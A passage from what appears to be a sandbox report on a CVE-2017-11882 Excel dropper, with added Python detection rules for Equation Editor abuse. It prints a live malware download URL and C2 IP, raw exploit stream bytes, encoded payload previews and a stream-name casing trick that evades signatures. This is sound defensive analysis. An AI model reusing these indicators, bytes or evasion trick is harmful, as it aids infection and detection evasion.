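     "DestinationPort": 443},
]

OFFICE_PARENTS = ("excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe")
EXEC_EXT = (".exe", ".dll", ".scr", ".com")


def _name(path: str) -> str:
    """Lower-case basename of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def direct_children_of(parent: str, events: List[Dict]) -> List[str]:
    """Naive parent/child rule; shows why anchoring on EXCEL.EXE misses EQNEDT32.EXE."""
    return [e["Image"] for e in events
            if e["EventID"] == 1 and _name(e["ParentImage"]) == parent]


def eqnedt_child_processes(events: List[Dict]) -> List[str]:
    """'Office equation editor starts processes': EQNEDT32.EXE should never spawn anything."""
    return direct_children_of("eqnedt32.exe", events)


def eqnedt_network_connections(events: List[Dict]) -> List[Tuple[str, int]]:
    """'EQNEDT32.EXE connecting to internet': the editor has no legitimate network use."""
    return [(e["DestinationIp"], e["DestinationPort"]) for e in events
            if e["EventID"] == 3 and _name(e["Image"]) == "eqnedt32.exe"]


def eqnedt_dropped_executables(events: List[Dict]) -> List[str]:
    """'File Dropped By EQNEDT32EXE', narrowed here to executable extensions."""
    return [e["TargetFilename"] for e in events
            if e["EventID"] == 11 and _name(e["Image"]) == "eqnedt32.exe"
            and e["TargetFilename"].lower().endswith(EXEC_EXT)]


def user_dir_binaries_from_office(events: List[Dict]) -> List[str]:
    """'Suspicious Binary In User Directory Spawned From Office Application'.

    Walks the recorded parent chain via ProcessGuid so a binary under \\Users\\ is flagged
    when any ancestor, not only the direct parent, is an Office image or EQNEDT32.EXE.
    """
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    hits: List[str] = []
    for proc in procs.values():
        image = proc["Image"].lower()
        if "\\users\\" not in image or not image.endswith(EXEC_EXT):
            continue
        cur, seen = proc, set()
        while cur is not None and cur["ProcessGuid"] not in seen:
            seen.add(cur["ProcessGuid"])
            if _name(cur["ParentImage"]) in OFFICE_PARENTS:
                hits.append(proc["Image"])
                break
            cur = procs.get(cur["ParentProcessGuid"])
    return hits


def run_all(events: List[Dict]) -> Dict[str, list]:
    """Run every rule and return the hits keyed by rule name."""
    return {
        "eqnedt_child_processes": eqnedt_child_processes(events),
        "eqnedt_network_connections": eqnedt_network_connections(events),
        "eqnedt_dropped_executables": eqnedt_dropped_executables(events),
        "user_dir_binaries_from_office": user_dir_binaries_from_office(events),
    }


if __name__ == "__main__":
    for rule, hits in run_all(EVENTS).items():
        print(f"{rule}: {hits}")
```

Against the constructed events, `direct_children_of("excel.exe", EVENTS)` returns nothing while every EQNEDT32.EXE-anchored rule fires on ghxtg8op.exe, which is the point: a rule that only checks the Office process as parent would see the whole chain as svchost.exe activity.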

Antivirus detection

Initial sample (Source | Detection | Scanner | Label):
Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | 66% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | 100% | Avira | EXP/CVE-2017-11882.Gen

Dropped files (Source | Detection | Scanner):
C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe | 100% | Joe Sandbox ML

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label). The characters after ngown.exe in four of the rows are trailing bytes from the memory-dump strings the URLs were carved from, so those variants are scored as separate, unknown URLs:
http://aquafusion.com.co/ngbx/ngown.exeG | 0% | Avira URL Cloud | safe
http://aquafusion.com.co/ngbx/ngown.exejjC: | 0% | Avira URL Cloud | safe
http://aquafusion.com.co/ngbx/ngown.exej | 0% | Avira URL Cloud | safe
http://aquafusion.com.co/ngbx/ngown.exe | 100% | Avira URL Cloud | malware
http://aquafusion.com.co/ngbx/ngown.exeroC: | 0% | Avira URL Cloud | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
aquafusion.com.co | 190.90.160.170 | true | true | (none) | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://aquafusion.com.co/ngbx/ngown.exe | true | Avira URL Cloud: malware | unknown

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://aquafusion.com.co/ngbx/ngown.exeG | EQNEDT32.EXE, 00000002.00000003.482907203.000000000091F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://aquafusion.com.co/ngbx/ngown.exejjC: | EQNEDT32.EXE, 00000002.00000002.486608016.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | ghxtg8op.exe, 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
http://aquafusion.com.co/ngbx/ngown.exej | EQNEDT32.EXE, 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://aquafusion.com.co/ngbx/ngown.exeroC: | EQNEDT32.EXE, 00000002.00000003.482907203.000000000092E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
190.90.160.170 | aquafusion.com.co | Colombia | 26619 | GTDCOLOMBIASASCO | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1572388
                      Start date and time:2024-12-10 14:19:00 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 65
                      • Number of non-executed functions: 271
                      Cookbook Comments:
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Execution Graph export aborted for target RegSvcs.exe, PID 3788 because it is empty
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
Time | Type | Description
08:20:48 | API Interceptor | 173x Sleep call for process: EQNEDT32.EXE modified
08:20:55 | API Interceptor | 234x Sleep call for process: RegSvcs.exe modified
Context for IP 190.90.160.170 (Associated Sample Name / URL | Detection | Threat Name):
mfyPnr7Rxa.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc
RFQ PO9845.xlsx | malicious | Unknown

Context for domains: No context

Context for ASN GTDCOLOMBIASASCO (Associated Sample Name / URL | Detection | Threat Name | IP):
HUWwCrf0mn.elf | malicious | Mirai, Okiru | 179.50.127.137
b2bXo6vmDm.exe | malicious | SystemBC | 190.90.160.165
file.exe | malicious | SystemBC | 190.90.160.165
td2RgV6HyP.exe | malicious | SystemBC | 190.90.160.165
mfyPnr7Rxa.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc | 190.90.160.170
6vTIdx359L.elf | malicious | Mirai | 190.90.25.189
RFQ PO9845.xlsx | malicious | Unknown | 190.90.160.170
HxZECaqzaM.elf | malicious | Mirai | 179.50.6.161
RE8pE88rcb.elf | malicious | Unknown | 179.50.102.209
FtV0FviMeR.elf | malicious | Mirai | 190.90.162.1

Context for JA3 fingerprints: No context
Context for dropped files: No context
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........(.......}............@......................................@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):143138
                          Entropy (8bit):7.930415233954861
                          Encrypted:false
                          SSDEEP:3072:DzMtZ/oXgItrhkgxKHusdWsSDsQ2Zu5Odh2zTXrS0nPO4:DzMtZagyr6gxK9FSDsQ2wOdh2zT20V
                          MD5:051F32A5901FDF7C15EA93E86BBF3A0F
                          SHA1:B3D79BE4870E5FF8F11246BEE989AB950CC3FC73
                          SHA-256:045BA7B6656DE852E5F1F2F23598A5C936E059277382B1751E52A0D41BD80F53
                          SHA-512:9785B515803D739651B2255791AB70D3D74A4965FB0ECE28FC6A4D3FA807B6B1FCEB21FD62663AC7EB649D2FC02B8398932823BEA156C5F02C69D2B8911E8229
                          Malicious:false
                          Reputation:low
                          Preview:EA06.....Z....J.Q*T...a7.L..I........z`.ni...N..4..1S.f.y......?X.O.TY...6..,...fE]....{$.q+..k6..!j....].{=..'f;.../t..cg.H@....&t....K.M).).../.I....4>Tp.r.0....JD.V.4...ss:d.n...=..L..:T..i..&...\P.4;..S......@.]( ._6.c5...}...e.eD...v.r..``........i..h.P.s.1....d.Sd.Z..}Q...',X.!4..2.p._.$."G....jAJ.R..............\.*~8.....N3.......)....oO.')s*%P.............a...7.b.J...........\N...I7z.....n.....m...4..K...p7_....=.L.zn.W..U..9.3E..e.:..q..B,S.?.K..)X.>n.q..(Wl.....<.n..K.D....G..K$..,.{).G...Rc#......[..d}.n..I=.Z.T...X.D.=.V..%.Y3.=/.t..K.0....S.. @....@..n.0.....A@[1K..u...rR.h[...`.....h\..b.?..Dk.....tyn.W.s..1W...ei..........Z.Q.T.W......}..Vo:.._T.B.sy.*m0..f.z....s..9...7.Ui4j<6s..s2.......s}zY.G....:2...sf.>P...........4.t...."....)[ ..!%..d.x..K..M..=..l.Xb..A"...b.H..*.Zh.k,...3*%b..Z.....Z.Q*.(...2.Mht....M.M.`.D..H.B*T.|.....b.G..4..at.<&...B.,..& u...I...)...x.A.Z.BoL..c..e....XoQ...kI.3*...w.6.s&...j"..Z..zt..U.L.Z.e..
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):14568
                          Entropy (8bit):7.633331238706717
                          Encrypted:false
                          SSDEEP:384:ITYznwMNeAOPPYLDfvWME/eTk5mUOY49D1nSH6RZ5DPsi6t:IAwJV8DfvWkOL4bSHsZ5rq
                          MD5:0B168D705ACB9CD0F87A19AA68B58ECF
                          SHA1:712895BE031EE9820A2E9BA626B70C2C97565D98
                          SHA-256:8D5450118D094BD586A153AB0E6DF9A14FB304C266623614FFA54A22C774E3AA
                          SHA-512:201E399EAA1E364526CEF3C38905EA4EB46635A806BBB95D03EEB2B2DBFF71EEEAAE68CD0EAB7466FAC9E1A7616C629EF14E92BC7B66BA1842BE9C87B3D0EB49
                          Malicious:false
                          Reputation:low
                          Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):240128
                          Entropy (8bit):6.565914891381696
                          Encrypted:false
                          SSDEEP:6144:t78NtQ7umAd/qScP4S58xMk0T9an6gDTw:hstL3BI4Kk0T86sw
                          MD5:F5F22C9B86F5265099E677983B730EEA
                          SHA1:307810F6EC3796AF29924AAA7D2E28B8A600B386
                          SHA-256:95BE62558001287F393C2B33D1A48D894A3399D5E65A4A2664780C975E7DCFF8
                          SHA-512:CA841BC2593C0EBE4ACE6CFB190031761793688CD3CBD342CB78D397D39B8FF0F03895425A2E12CCAD4C47ACC94E10CA0CBD075EE228CECE6F1A9F6C51D656D9
                          Malicious:false
                          Reputation:low
                          Preview:.j.L15CJ6DRM..07.25CJ2DR.EK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ.DRMKT.9L.<.k.E..d.X^?.E1%U63 e(QY"]Ac(Wd 8+kYYlvz.j_+6(kF==h25CJ2DR..K0{M15.g.!RMEK07L2.CH3OSFEK.4L2=CJ2DRM{.37L.5CJ.GRME.07l25CH2DVMEK07L21CJ2DRMEK03L27CJ2DRMGKp.L2%CJ"DRME[07\25CJ2DBMEK07L25CJ2..NE.07L2.@JtARMEK07L25CJ2DRMEK07.15OJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25Cj2DZMEK07L25CJ2LrME.07L25CJ2DRMk?UO825C..GRMeK07.15CH2DRMEK07L25CJ2dRM%eBD>Q5CJtARME.37L45CJ.GRMEK07L25CJ2D.ME..E)^Z J2HRMEK.4L27CJ2.QMEK07L25CJ2DR.EKr7L25CJ2DRMEK07L2..I2DRME.07L05FJ..PMQz17O25CK2DTMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CW......1.?!M.b.*.H._..:.}K.X.0$..ysN.....b>6..2.Lz..D....9.=F33.....WGC;+.Ek],.V.....b>r..K+.J..Kq.\Bv.l.j...~K&....C..V,'.%"=)..d-TT1#.F.LEK07.......$=.j.O=+wXJ.....%4d...:RME/07L@5CJSDRM.K07#25C$2DR3EK0IL25.J2D.MEK.7L2.CJ2)RMEo07LL5CJ.9]B...^?..CJ2DRx....!.....s..}A.2iW{..6...j2..:+.E.....>..Yy.]`/Tn..76J60AM6G^pK....7GN7FUIFG.9...k.b.|..=....H..MEK07L.5C.2DR..K.7L2.C.2..MEK..L.5.J...M
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........(.......}............@......................................@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:dropped
                          Size (bytes):143378
                          Entropy (8bit):2.992214787701521
                          Encrypted:false
                          SSDEEP:96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6suHCCGcuY9Ihyvuu3srWVjjGqnBaAJZdjureP:H30jU7qnGcuY9Ihyvuu3srWVeqnBaA
                          MD5:030C49A335A83FF97BCCA1A235B52F7A
                          SHA1:B2678A23F36BD3393EF5D9C90D4CAAF9A53C891E
                          SHA-256:CFAA9115C0D2FA15BF241234EC585B7012D2ADC7901A09516B804522B0A034AA
                          SHA-512:3F86EA7108B7E13AC16689B20F102748280473D580FD700FB1B5C342A8C6B6290C62B945B337C35C17AE621512223EA5D991D2ED1C140967DB4406CC6EFD724E
                          Malicious:false
                          Reputation:low
                          Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:false
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          File type:Microsoft Excel 2007+
                          Entropy (8bit):7.998191833534959
                          TrID:
                          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                          • ZIP compressed archive (8000/1) 18.60%
                          File name:Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
                          File size:687'458 bytes
                          MD5:80422f16531f8c43944e04bf3538efdf
                          SHA1:f137aa50426c79fa8645d6bfc2610a98cf2c4fa3
                          SHA256:971e2daca5513d707e83bc64690d35a29a7c27d02fa0f1dce8b6694e79b9a65c
                          SHA512:dec49d2e88d90d2718b8f628e9eec88561e3ca9d0520672dcba49e2cfc4ef78ee44919fb7d445578a50b6eb347176b13f378de88d46fe15714e8e723c6ccc51a
                          SSDEEP:12288:tOnI4PKOkIHM9vnRlZChi+phVy3PXkPwS9OX3sK6w14sy2rmU9yDQY:RUHs95lZr+p7y/XtEOHsQ14zuWJ
                          TLSH:14E423DBEEE3180FE323C9B1C0CE34EA279921354B6D9845277C1599312F36B396625E
                          File Content Preview:PK.........A.Y..l3............[Content_Types].xmlUT.....Wg..Wg..Wg...n.0.E.......D......E.,..I>."..c.@....;....j...l. 5.r.g.....b.1i.j6.F..'..nY.........S.x.5.Ab..._&O....h.j."...'........,|...5.y.r%....F.....a.Y.M'3X...b...~%.-Yq....j.m...|:..%G..x.....y
                          Icon Hash:2562ab89a7b7bfbf
                          Document Type:OpenXML
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:False
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:False
                          Total Edit Time:0
                          Number of Pages:0
                          Number of Words:0
                          Number of Characters:0
                          Creating Application:Microsoft Excel
                          Security:0
                          Number of Lines:0
                          Number of Paragraphs:0
                          Thumbnail Scaling Desired:false
                          Contains Dirty Links:false
                          Shared Document:false
                          Changed Hyperlinks:false
                          Application Version:12.0000
                          General
                          Stream Path:\x1oLE10naTiVe
                          CLSID:
                          File Type:data
                          Stream Size:883698
                          Entropy:5.983865513865266
                          Base64 Encoded:False
                          Data ASCII:m < . . . z \\ | . . h B . . 2 e s K . . V . . W - _ W X 4 " D . l ) . g ' U ; . ~ . 8 r T . i z & k . . = " F c . G % " Q = & 9 . k D \\ W L k L . . . . s & f A . F C H > . 4 . C P W i 6 . . . i . . E . . Q R Z Y . l . . _ X S z . . . . x . . O . . f . . [ k . ^ f . . . . . . W n . _ d O - ' P Q . ~ . . - E . . . - f . . r ~ . . . Y X . . . . 1 . . X o . i ' v U G . / . N 7 ! W . . . . . . * . . U ( g ; . l ] . . V . . t G H 9 r . . . . c < . . y . . U o " . R . . x 0 N . . . m i H - . . c l . } 1 . . l O m
                          Data Raw:6d 3c c1 05 03 d6 83 7a 5c 7c 01 08 68 f5 b9 c3 42 ba ff f7 d1 8b 11 8b 32 bf 65 d5 c6 73 81 c7 4b 92 7f 8c 8b 07 56 ff d0 05 01 9f 57 ef 2d 5f 9e 57 ef ff e0 58 34 90 b7 22 e0 ab 44 00 a3 6c f1 e7 29 01 67 27 84 b2 d5 55 3b ce d3 c5 9a 7e 01 38 72 54 a4 1f 69 de 7a d2 26 6b 9e 02 9a a7 7f a6 97 9a 3d f6 9d 22 46 63 84 c9 b8 d7 47 25 c8 22 51 3d 26 39 f1 08 b9 6b 44 5c a5 8d 57 4c
                          General
                          Stream Path:tQw4qQd6Y2k6qgdG6uAKCy8
                          CLSID:
                          File Type:empty
                          Stream Size:0
                          Entropy:0.0
                          Base64 Encoded:False
                          Data ASCII:
                          Data Raw:
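The embedded object above sits in a stream named \x1oLE10naTiVe with no CLSID, where an ordinary embedding carries the canonical Ole10Native spelling. MS-CFB compares directory entry names case-insensitively, so the loader still resolves the stream while exact-match signatures for the canonical name do not. The scanner below is an added example, not Joe Sandbox or oletools code: it walks an OOXML package, byte-scans each embedded .bin for a UTF-16LE Ole10Native name in any casing and for the Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046}, and reports non-canonical spellings. The package it scans is constructed in memory for the example (a zip holding a stub compound-file header, not a real embedding), and it does not parse the CFB directory, so treat it as triage rather than a replacement for a proper compound-file parser.

```python
"""Triage scan of an OOXML package for embedded OLE objects with an Ole10Native stream.

Added example, not Joe Sandbox or oletools code. It byte-scans each embedded .bin instead
of parsing the compound-file directory, so it is a triage heuristic only.
"""
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List

# Compound-file directory entry names are stored as UTF-16LE; match 'Ole10Native' in any casing.
OLE10NATIVE_RE = re.compile(
    rb"[Oo]\x00[Ll]\x00[Ee]\x001\x000\x00[Nn]\x00[Aa]\x00[Tt]\x00[Ii]\x00[Vv]\x00[Ee]\x00")
CANONICAL = "Ole10Native"
# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} in its on-disk little-endian form.
EQUATION3_CLSID = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


@dataclass
class OleFinding:
    member: str           # zip member, e.g. xl/embeddings/oleObject1.bin
    stream_name: str      # Ole10Native name as actually spelled, '' if only the CLSID matched
    mixed_case: bool      # spelling differs from the canonical 'Ole10Native'
    equation_clsid: bool  # Equation Editor 3.0 CLSID bytes are present


def scan_ooxml(package: bytes) -> List[OleFinding]:
    """Return one finding per embedded .bin carrying an Ole10Native name or the Equation CLSID."""
    findings: List[OleFinding] = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".bin"):
                continue
            blob = zf.read(member)
            match = OLE10NATIVE_RE.search(blob)
            has_clsid = EQUATION3_CLSID in blob
            if not match and not has_clsid:
                continue
            spelled = match.group(0).decode("utf-16-le") if match else ""
            findings.append(OleFinding(member, spelled,
                                       bool(match) and spelled != CANONICAL, has_clsid))
    return findings


def build_package(stream_name: str, clsid: bytes = b"") -> bytes:
    """Constructed OOXML-like zip with one embedded blob (test data, not a valid compound file).

    The \\x01 prefix mirrors the real stream name '\\x01Ole10Native'; the header is only the magic.
    """
    ole = (CFB_MAGIC + b"\x00" * 24 + b"\x01\x00" + stream_name.encode("utf-16-le")
           + b"\x00" * 16 + clsid)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/embeddings/oleObject1.bin", ole)
    return buf.getvalue()


if __name__ == "__main__":
    # Spelling seen in this report's sample versus a canonical Equation.3 embedding.
    for label, pkg in (("evasive", build_package("oLE10naTiVe")),
                       ("canonical", build_package(CANONICAL, EQUATION3_CLSID))):
        for finding in scan_ooxml(pkg):
            print(label, finding)
```

Run against a real document, the same `scan_ooxml` call takes the bytes of the .xlsx; a mixed-case hit with no Equation CLSID, as in this sample, is the signature-evasion pattern, while a canonical name together with the Equation.3 CLSID is simply an Equation Editor object that still deserves a look because the editor itself is the exploited component.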
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 14:20:51.826019049 CET | 49165 | 80 | 192.168.2.22 | 190.90.160.170
Dec 10, 2024 14:20:51.945301056 CET | 80 | 49165 | 190.90.160.170 | 192.168.2.22
Dec 10, 2024 14:20:51.945420980 CET | 49165 | 80 | 192.168.2.22 | 190.90.160.170
Dec 10, 2024 14:20:51.945811987 CET | 49165 | 80 | 192.168.2.22 | 190.90.160.170
Dec 10, 2024 14:20:52.065356016 CET | 80 | 49165 | 190.90.160.170 | 192.168.2.22
Dec 10, 2024 14:20:53.183305979 CET | 80 | 49165 | 190.90.160.170 | 192.168.2.22
Dec 10, 2024 14:20:53.183404922 CET | 80 | 49165 | 190.90.160.170 | 192.168.2.22
Dec 10, 2024 14:20:53.183410883 CET | 80 | 49165 | 190.90.160.170 | 192.168.2.22
